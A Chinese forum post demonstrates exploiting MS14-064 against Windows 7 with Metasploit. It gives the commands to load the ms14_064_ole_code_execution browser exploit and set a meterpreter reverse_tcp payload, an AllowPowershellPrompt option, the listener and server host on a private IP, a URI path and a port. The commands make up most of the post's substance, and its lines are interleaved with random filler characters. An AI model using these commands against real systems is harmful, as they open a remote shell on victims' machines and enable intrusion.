找回密码
 立即注册
查看: 2056|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

) c* U$ U6 ^) c( Q, _0 W 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 & I& A: c5 G) S9 n T$ s9 N

# b4 Q$ q, F6 a9 a

) L, N( f9 C: \- X 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: ! e) d, u, F' J# e" Y5 R3 c

6 }" \- }* @. k; m1 j

4 v! h& D2 G. }3 V& o% I) F 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp . P; J+ @' G @! A! U

9 C* Q1 d; P( i3 f; V

' y! l) _6 h) p% |- v/ _% l7 F             set AllowPowershellPrompt true # V6 J: {" F2 \

8 W8 _/ j+ F" {7 o

# U! s0 G* ^5 F             Set LHOST 192.168.0.109; K! V1 X8 F2 k8 T2 ^$ N& g; Y$ O' \3 b

8 `0 R. u0 I, r/ P7 u7 s3 L* W+ h

2 n, K, Q6 \+ U, Q5 Q             set SRVHOST 192.168.0.109* ]) H3 g& q) w8 u

$ E$ S8 B9 {8 g9 e

0 ?0 [3 V" |8 u i" u2 p             Set uripath share X2 m% I+ B& k- q

5 R+ M1 u5 A( S$ }# Q1 c: Z: C

8 T0 b" \; T! [; L# h" V6 S. [! r             Set srvport 80 ( p6 J! {) f3 m& e( ~: P

) |9 ]( C, ?2 n J* c

$ D- M3 y" s6 b   * E, P/ u2 L, _ ^1 P @" v

$ J ]* D5 |- o8 J; |

7 Y' h( z6 H% p) }: j9 j# {   1 m* _1 v6 d( i E8 `4 ]+ Q

3 H0 m' m8 _9 [5 I

' u# r, q& K7 q3 h7 @: R  # N$ |! E8 T; z2 p2 b8 b

, Z- d, b- R$ ^! A+ r/ ]8 {

' N6 ^. j5 o$ V% k. Q  % B3 N5 S# R1 c/ k

( _- w5 h: e, D; V- w

' L. s$ z; a) Z) Z. u  $ T) `: N: a1 y% N# Z' @$ C+ z' M

/ A3 k# ~% n, p

5 |, S I+ V" q6 a 下面我们来访问本地地址如图: z+ \+ T. b0 I/ e1 z- q2 x

. d+ {: z! Z, @ }3 A% q8 i% ^

+ j. y( ^& T- S: q Y   9 V, i* z* |, F3 G1 U1 d1 Z- K

$ q& o6 n' e1 p3 b# z* j B

7 F- @' G1 E9 g! G& Q  1 y" F' c& M1 ^5 w: P( x

- c0 |7 g% c! W9 B/ {

3 c: q3 @. w$ j$ u) H$ U 9 R( W6 {9 A( \1 w

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表